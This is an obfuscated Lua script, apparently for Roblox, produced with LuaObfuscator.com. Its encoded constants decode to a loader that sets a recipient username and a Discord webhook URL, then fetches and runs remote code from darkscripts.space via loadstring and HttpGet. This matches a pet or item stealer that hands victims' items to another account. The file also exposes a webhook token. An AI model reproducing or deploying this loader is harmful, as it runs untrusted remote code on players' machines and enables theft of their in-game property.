--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v78=0;while true do if (v78==0) then v19=v0(v3(v30,1,1));return "";end end else local v79=0;local v80;while true do if (v79==0) then v80=v2(v0(v30,16));if v19 then local v106=0;local v107;while true do if (v106==0) then v107=v5(v80,v19);v19=nil;v106=1;end if (v106==1) then return v107;end end else return v80;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v81=0 -0 ;local v82;while true do if (v81==(0 -0)) then v82=(v31/(2^(v32-1)))%((3 -(878 -(282 + 595)))^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%(569 -(330 + 37 + (286 -85)))) ;end end else local v83=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v83 + v83))>=v83) and 1) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (121 -(32 + 85)) ;return (v40 * (16441815 + 335401)) + (v39 * (14533 + 51003)) + (v38 * 256) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=958 -(892 + 12 + 53) ;local v44=(v20(v42,2 -1 ,36 -16 ) * ((3 -1)^(382 -(87 + 263)))) + v41 ;local v45=v20(v42,201 -(67 + 113) ,23 + 8 );local v46=((v20(v42,78 -46 )==(1 + 0)) and  -(3 -(3 -1))) or (953 -(802 + 150)) ;if (v45==0) then if (v44==(0 -(0 + 0))) then return v46 * (0 -0) ;else v45=1;v43=(791 -(368 + 423)) + 0 ;end elseif (v45==((9566 -6522) -(915 + 82))) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2210 -(1069 + 118)) ) * (v43 + (v44/(((22 -(10 + 8)) -2)^(113 -61)))) ;end local function v25(v47) local v48=0;local v49;local v50;while true do if (v48==(3 -2)) then v49=v3(v16,v18,(v18 + v47) -(443 -((1554 -(116 + 1022)) + 26)) );v18=v18 + v47 ;v48=6 -4 ;end if (v48==(1 + (4 -3))) then v50={};for v90=1 -0 , #v49 do v50[v90]=v2(v1(v3(v49,v90,v90)));end v48=(259 + 182) -(145 + 293) ;end if (v48==(433 -(44 + 386))) then return v6(v50);end if (v48==(1486 -(998 + 488))) then v49=nil;if  not v47 then local v100=0;while true do if (v100==(0 + 0)) then v47=v23();if (v47==(0 + 0)) then return "";end break;end end end v48=773 -(201 + 571) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 + 0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51==(0 -0)) then local v87=(function() return 1990 -(582 + 1408) ;end)();local v88=(function() return;end)();while true do if (v87~=(698 -(208 + 490))) then else v88=(function() return 0;end)();while true do if (v88~=(0 + 0)) then else v52=(function() return {};end)();v53=(function() return {};end)();v88=(function() return 1 + 0 ;end)();end if (v88==(1 -0)) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v88=(function() return 2;end)();end if (v88==2) then v51=(function() return  #"}";end)();break;end end break;end end end if (v51~=2) then else for v92= #"{",v23() do local v93=(function() return v21();end)();if (v20(v93, #"\\", #"~")~=(836 -(660 + 176))) then else local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101~=0) then else local v113=(function() return 0 + 0 ;end)();while true do if (v113==0) then v102=(function() return v20(v93,2, #"19(");end)();v103=(function() return v20(v93, #".dev",208 -(14 + 188) );end)();v113=(function() return 1825 -(1195 + 629) ;end)();end if (v113==1) then v101=(function() return 676 -(534 + 141) ;end)();break;end end end if (v101~=1) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(0 + 0)) then local v128=(function() return 0 + 0 ;end)();local v129=(function() return;end)();while true do if (v128==(0 + 0)) then v129=(function() return 0 + 0 ;end)();while true do if (v129==(0 + 0)) then v104[ #"gha"]=(function() return v22();end)();v104[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"\\") then v104[ #"xxx"]=(function() return v23();end)();elseif (v102==(1 + 1)) then v104[ #"-19"]=(function() return v23() -((3 -1)^(25 -9)) ;end)();elseif (v102== #"xnx") then local v184=(function() return 0;end)();while true do if (v184~=0) then else v104[ #"91("]=(function() return v23() -((5 -3)^(9 + 7)) ;end)();v104[ #".dev"]=(function() return v22();end)();break;end end end v101=(function() return 1 + 1 ;end)();end if (v101==3) then if (v20(v103, #"asd", #"xnx")== #"|") then v104[ #".dev"]=(function() return v57[v104[ #"asd1"]];end)();end v52[v92]=(function() return v104;end)();break;end if (v101==2) then if (v20(v103, #",", #"~")~= #"}") then else v104[2]=(function() return v57[v104[2 + 0 ]];end)();end if (v20(v103,398 -(115 + 281) ,4 -2 )~= #"~") then else v104[ #"gha"]=(function() return v57[v104[ #"asd"]];end)();end v101=(function() return 3 + 0 ;end)();end end end end for v94= #",",v23() do v53[v94-#"[" ]=(function() return v28();end)();end return v55;end if (v51~= #"{") then else local v89=(function() return 0 -0 ;end)();while true do if ((0 -0)==v89) then v56=(function() return v23();end)();v57=(function() return {};end)();v89=(function() return 1385 -(746 + 638) ;end)();end if (v89~=(869 -(550 + 317))) then else v51=(function() return 2;end)();break;end if ((1 -0)~=v89) then else for v108= #"<",v56 do local v109=(function() return 341 -(218 + 123) ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (0==v109) then local v115=(function() return 0;end)();while true do if (v115==(1582 -(1535 + 46))) then v109=(function() return 1 + 0 ;end)();break;end if (v115==0) then local v157=(function() return 0 -0 ;end)();while true do if (v157==(560 -(306 + 254))) then v110=(function() return 0;end)();v111=(function() return nil;end)();v157=(function() return 1;end)();end if (v157==(1 + 0)) then v115=(function() return 1;end)();break;end end end end end if (v109==(1 -0)) then v112=(function() return nil;end)();while true do if (v110== #">") then if (v111== #"}") then v112=(function() return v21()~=(0 -0) ;end)();elseif (v111==2) then v112=(function() return v24();end)();elseif (v111== #"19(") then v112=(function() return v25();end)();end v57[v108]=(function() return v112;end)();break;end if (v110==0) then local v159=(function() return 0;end)();local v160=(function() return;end)();while true do if ((285 -(134 + 151))==v159) then v160=(function() return 0 + 0 ;end)();while true do if (v160~=(1666 -(970 + 695))) then else v110=(function() return  #"{";end)();break;end if (v160~=0) then else v111=(function() return v21();end)();v112=(function() return nil;end)();v160=(function() return 604 -(268 + 335) ;end)();end end break;end end end end break;end end end v55[ #"-19"]=(function() return v21();end)();v89=(function() return 2;end)();end end end end end local function v29(v58,v59,v60) local v61=v58[291 -(49 + 11 + 230) ];local v62=v58[1 + 1 ];local v63=v58[(2041 -1466) -(426 + 146) ];return function(...) local v64=v61;local v65=v62;local v66=v63;local v67=v27;local v68=2 -1 ;local v69= -((3 -2) + (1018 -(697 + 321)));local v70={};local v71={...};local v72=v12("#",...) -(812 -(569 + 242)) ;local v73={};local v74={};for v84=0 -0 ,v72 do if (v84>=v66) then v70[v84-v66 ]=v71[v84 + (2 -1) + (0 -0) ];else v74[v84]=v71[v84 + (1025 -(706 + (732 -414))) ];end end local v75=(v72-v66) + (1252 -(721 + 530)) ;local v76;local v77;while true do v76=v64[v68];v77=v76[4 -3 ];if (v77<=((499 + 781) -(945 + 326))) then if (v77<=(9 -5)) then if (((625==625) and (v77<=(1 + 0))) or (3580<2844)) then if (v77>(700 -(271 + 429))) then local v116=v76[2 + 0 ];v74[v116]=v74[v116](v13(v74,v116 + (1501 -(1408 + 92)) ,v69));elseif ((588<1692) and (v74[v76[1088 -(461 + 625) ]]==v76[1292 -(993 + 295) ])) then v68=v68 + 1 + (0 -0) ;else v68=v76[1174 -(418 + (2018 -1265)) ];end elseif (v77<=(1 + 1)) then v74[v76[1 + 1 ]]=v60[v76[(1228 -(322 + 905)) + 2 ]];elseif (v77==((613 -(602 + 9)) + (1190 -(449 + 740)))) then v60[v76[6 -3 ]]=v74[v76[1 + 1 ]];else local v136=0 + (872 -(826 + 46)) ;local v137;while true do if ((v136==0) or (4797<3651)) then v137=v76[531 -(406 + 123) ];v74[v137]=v74[v137](v13(v74,v137 + (1770 -(1749 + 20)) ,v69));break;end end end elseif (v77<=(2 + 4)) then if (v77==(758 -((1186 -(245 + 702)) + 514))) then v60[v76[1325 -(1249 + 73) ]]=v74[v76[1 + 1 ]];else do return;end end elseif (v77<=(1152 -((1472 -1006) + 679))) then v74[v76[1331 -(797 + 532) ]]();elseif (v77>(19 -11)) then local v138=v76[5 -3 ];local v139,v140=v67(v74[v138](v13(v74,v138 + (1901 -(106 + 1794)) ,v76[3])));v69=(v140 + v138) -(1 + 0) ;local v141=0 + 0 ;for v161=v138,v69 do local v162=0 -0 ;while true do if (v162==(0 -0)) then v141=v141 + (115 -(4 + 110)) ;v74[v161]=v139[v141];break;end end end else local v142=584 -(57 + 527) ;local v143;local v144;while true do if (v142==(1428 -(41 + 1386))) then v74[v143 + (239 -(64 + 174)) ]=v144;v74[v143]=v144[v76[107 -(17 + 28 + 58) ]];break;end if ((v142==(0 + 0)) or (4177>4850)) then v143=v76[2 -0 ];v144=v74[v76[6 -3 ]];v142=2 -1 ;end end end elseif ((89<4490) and (v77<=(180 -(122 + 44)))) then if ((v77<=(10 + 1)) or (4983<1808)) then if (v77==(17 -7)) then v74[v76[1506 -((2261 -(260 + 1638)) + 1141) ]]=v76[1583 -(1183 + 397) ];else local v124=0 -0 ;local v125;local v126;while true do if ((v124==(1 + 0)) or (400>1111)) then v74[v125 + 1 + 0 ]=v126;v74[v125]=v126[v76[7 -3 ]];break;end if (v124==((505 -(382 + 58)) -(30 + 35))) then v125=v76[2 + 0 ];v126=v74[v76[1260 -((3345 -2302) + 178 + 36) ]];v124=3 -2 ;end end end elseif (v77<=(1224 -(323 + 889))) then if (v74[v76[5 -3 ]]==v76[584 -(361 + 219) ]) then v68=v68 + 1 + 0 ;else v68=v76[(666 -343) -(53 + 267) ];end elseif ((3829>3769) and (3051>1005) and (v77>((2582 -1713) -(564 + 292)))) then v68=v76[4 -(1206 -(902 + 303)) ];else v74[v76[1 + 1 ]]=v60[v76[416 -(15 + 398) ]];end elseif (v77<=(998 -(18 + (2116 -1152)))) then if ((1485<=2904) and (3693<=4382) and (v77>((134 -78) -41))) then v74[v76[2 + 0 ]]();else v68=v76[2 + 1 ];end elseif (v77<=(1018 -(938 + 63))) then do return;end elseif ((4269==4269) and ((v77>(2 + 10 + 6)) or (3282>4100))) then v74[v76[2]]=v76[1128 -(936 + 189) ];else local v151=0;local v152;local v153;local v154;local v155;while true do if (2==v151) then for v179=v152,v69 do v155=v155 + 1 + 0 ;v74[v179]=v153[v155];end break;end if (v151==(851 -(20 + 830))) then v69=(v154 + v152) -(1 + 0) ;v155=0 + 0 ;v151=128 -(116 + 10) ;end if (v151==(0 + 0)) then v152=v76[740 -(542 + 196) ];v153,v154=v67(v74[v152](v13(v74,v152 + (1 -0) ,v76[1 + 2 ])));v151=1;end end end v68=v68 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030A3Q00424F545354415231333203073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3132312Q363735363033363736322Q363539362F6244546131674A385A48703170647542772D4B3263786E526C5F5A2Q68387342316962734E33615F317A443931755779424A53616B39424A7736624E4F35624967776E4300143Q00120A3Q00013Q00260C3Q000B0001000200040E3Q000B000100120D000100033Q00120D000200043Q00200B00020002000500120A000400064Q0009000200044Q000100013Q00022Q001000010001000100040E3Q0013000100260C3Q00010001000100040E3Q0001000100120A000100083Q001203000100073Q00120A0001000A3Q001203000100093Q00120A3Q00023Q00040E3Q000100012Q00063Q00017Q00",v9(),...);
